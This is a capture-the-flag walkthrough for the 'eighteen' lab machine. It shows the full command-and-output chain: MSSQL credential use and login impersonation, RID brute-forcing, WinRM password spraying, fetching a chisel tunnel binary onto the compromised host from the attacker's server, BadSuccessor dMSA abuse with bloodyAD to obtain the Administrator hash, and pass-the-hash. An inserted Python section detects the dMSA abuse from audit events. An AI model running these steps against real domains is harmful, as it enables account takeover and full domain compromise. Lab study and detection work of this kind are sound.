1/ Initial Enumeration
1.1 Nmap scan
nmap -sC -sV -Pn [IP] -oN /tmp/htb_10.129.2.72_initial.nmap
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
ms-sql-ntlm-info:
DNS_Domain_Name: eighteen.htb
DNS_Computer_Name: DC01.eighteen.htb
echo "[IP] eighteen.htb dc01.eighteen.htb" | sudo tee -a /etc/hosts
2/ Web App + MSSQL Discovery
2.1 Register/login functionality
curl -s -i -H 'Host: eighteen.htb' -X POST http://[IP]/register \
--data 'full_name=Test User&username=testuser123&email=test123@mail.com&password=Test123' | head -n 20
curl -s -i -H 'Host: eighteen.htb' -X POST http://[IP]/login \
--data 'username=testuser123&password=Test123' | head -n 20
2.2 SQL service brute/spray and valid credential
netexec mssql [IP] -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
[+] DC01\kevin:iNa2we6haRj2gaw!
3/ SQL Privilege Escalation Inside DB
3.1 Identify impersonation edge
printf "select b.name as grantee, c.name as grantor, a.permission_name,a.state_desc \
from sys.server_permissions a \
join sys.server_principals b on a.grantee_principal_id=b.principal_id \
join sys.server_principals c on a.grantor_principal_id=c.principal_id \
where a.permission_name='IMPERSONATE';\nexit\n" | \
impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@'[IP]
grantee grantor permission_name state_desc
kevin appdev IMPERSONATE GRANT
3.2 Access application DB as impersonated principal
printf "EXECUTE AS LOGIN='appdev';\nuse financial_planner;\nselect table_name from information_schema.tables;\nselect top 20 username,password_hash,is_admin from users;\nexit\n" | \
impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@'[IP]
table_name:
users
incomes
expenses
allocations
analytics
visits
username is_admin password_hash
admin 1 pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$...
4/ Pivot to Domain User Credential
4.1 Enumerate domain objects through MSSQL-authenticated RID brute
netexec mssql [IP] -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute 5000
1606: EIGHTEEN\jamie.dunn
1607: EIGHTEEN\jane.smith
1608: EIGHTEEN\alice.jones
1609: EIGHTEEN\adam.scott
1610: EIGHTEEN\bob.brown
1611: EIGHTEEN\carol.white
1612: EIGHTEEN\dave.green
4.2 Password spray to WinRM
cat >/tmp/domain_users.txt <<'EOF'
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green
mssqlsvc
EOF
netexec winrm [IP] -u /tmp/domain_users.txt -p 'iloveyou1' -d eighteen.htb --continue-on-success
[+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
5/ User Flag
printf 'whoami\ntype C:\\Users\\adam.scott\\Desktop\\user.txt\nexit\n' | \
evil-winrm -i [IP] -u adam.scott -p 'iloveyou1'
eighteen\adam.scott
6/ Root via BadSuccessor (dMSA) Abuse
6.1 Tunnel setup (attacker)
# HTTP file host
cd /tmp
python3 -m http.server 9001

# chisel server (reverse SOCKS)
cd /tmp
./chisel_linux_arm64 server --reverse -p 8000
6.2 Transfer and run chisel client from compromised host
printf 'iwr -UseBasicParsing -Uri "http://'$LHOST':9001/chisel_windows" -OutFile "chisel.exe"\nexit\n' | \
evil-winrm -i [IP] -u adam.scott -p 'iloveyou1'
Run client from WinRM shell:
.\chisel.exe client 10.10.14.87:8000 R:socks
session#3: tun: proxy#R:127.0.0.1:1080=>socks: Listening
6.3 Route LDAP/Kerberos via proxychains + run bloodyAD
Create proxychains profile:
cat >/tmp/proxychains_chisel.conf <<'EOF'
strict_chain
proxy_dns
[ProxyList]
socks5 127.0.0.1 1080
EOF
Sanity-check LDAP through tunnel:
proxychains4 -f /tmp/proxychains_chisel.conf -q timeout 8 bash -lc 'cat < /dev/null > /dev/tcp/10.129.2.72/389' && echo OPEN
Run badSuccessor:
proxychains4 -f /tmp/proxychains_chisel.conf ~/.local/bin/bloodyAD \
-d eighteen.htb -u adam.scott -p 'iloveyou1' -H 10.129.2.72 -i 10.129.2.72 \
add badSuccessor --prepatch websvc2
[+] Creating DMSA websvc2$ in OU=Staff,DC=eighteen,DC=htb
[+] Impersonating: CN=Administrator,CN=Users,DC=eighteen,DC=htb
[+] dMSA TGT stored in ccache file websvc2_Rd.ccache
... dMSA previous keys found in TGS ...
RC4: 0b133be956bfaddf9cea56701affddec
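From the defender's side, the dMSA creation and the migration link set above leave a distinctive trail in Directory Service auditing. The following Python is an added example, not part of this writeup or of bloodyAD: it runs over constructed records modelled on event 5137 (object created) and 5136 (attribute modified), flags dMSA creations and changes to msDS-ManagedAccountPrecededByLink / msDS-DelegatedMSAState by principals outside an assumed authorised set, and raises severity when the link targets a privileged account. The flat record layout and the authorised-admin name are assumptions of the example.

```python
# Added example: flag the AD changes a BadSuccessor-style dMSA abuse leaves behind.
# Records are constructed for this example, modelled on Windows Directory Service
# audit events 5137 (object created) and 5136 (attribute modified); the flat dict
# layout is an assumption, real EVTX/XML events need a proper parser first.
PRIVILEGED_DNS = {"CN=Administrator,CN=Users,DC=eighteen,DC=htb"}
AUTHORIZED_DMSA_ADMINS = {"EIGHTEEN\\svc_dmsa_admin"}  # assumed: who may create/migrate dMSAs
DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
DMSA_DN = "CN=websvc2,OU=Staff,DC=eighteen,DC=htb"

SAMPLE_EVENTS = [  # constructed sample records
    {"id": 5137, "subject": "EIGHTEEN\\adam.scott", "objectClass": DMSA_CLASS,
     "dn": DMSA_DN, "attr": None, "value": None},
    {"id": 5136, "subject": "EIGHTEEN\\adam.scott", "objectClass": DMSA_CLASS,
     "dn": DMSA_DN, "attr": "msDS-ManagedAccountPrecededByLink",
     "value": "CN=Administrator,CN=Users,DC=eighteen,DC=htb"},
    {"id": 5136, "subject": "EIGHTEEN\\adam.scott", "objectClass": DMSA_CLASS,
     "dn": DMSA_DN, "attr": "msDS-DelegatedMSAState", "value": "2"},
    # benign change by an authorised admin on an ordinary user object
    {"id": 5136, "subject": "EIGHTEEN\\svc_dmsa_admin", "objectClass": "user",
     "dn": "CN=jane.smith,OU=Staff,DC=eighteen,DC=htb",
     "attr": "description", "value": "Finance"},
]


def badsuccessor_alerts(events, privileged_dns=PRIVILEGED_DNS,
                        authorized=AUTHORIZED_DMSA_ADMINS):
    """Return (severity, message) tuples for dMSA creations and migration-link
    changes made by principals outside the authorised set."""
    alerts = []
    for ev in events:
        if ev["subject"] in authorized:
            continue  # expected dMSA lifecycle activity; not interesting here
        if ev["id"] == 5137 and ev["objectClass"] == DMSA_CLASS:
            alerts.append(("medium", f"dMSA {ev['dn']} created by {ev['subject']}"))
        elif ev["id"] == 5136 and ev["attr"] == "msDS-ManagedAccountPrecededByLink":
            # link pointing at a privileged account is the escalation itself
            sev = "critical" if ev["value"] in privileged_dns else "high"
            alerts.append((sev, f"{ev['dn']} set to succeed {ev['value']} by {ev['subject']}"))
        elif ev["id"] == 5136 and ev["attr"] == "msDS-DelegatedMSAState" and ev["value"] == "2":
            # state 2 marks the migration as completed, so the KDC honours the link
            alerts.append(("high", f"{ev['dn']} migration marked complete by {ev['subject']}"))
    return alerts


if __name__ == "__main__":
    for sev, msg in badsuccessor_alerts(SAMPLE_EVENTS):
        print(f"[{sev}] {msg}")
```

A complementary preventive check is to audit which non-admin principals hold CreateChild rights for that object class on OUs such as OU=Staff, since that is the permission the step above relies on.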
6.4 Pass-the-hash as Administrator over WinRM
netexec winrm [IP] -u Administrator -H 0b133be956bfaddf9cea56701affddec -d eighteen.htb
[+] eighteen.htb\Administrator:0b133be956bfaddf9cea56701affddec (Pwn3d!)
Read root flag:
printf 'whoami\ntype C:\\Users\\Administrator\\Desktop\\root.txt\nexit\n' | \
evil-winrm -i [IP] -u Administrator -H '0b133be956bfaddf9cea56701affddec'
eighteen\administrator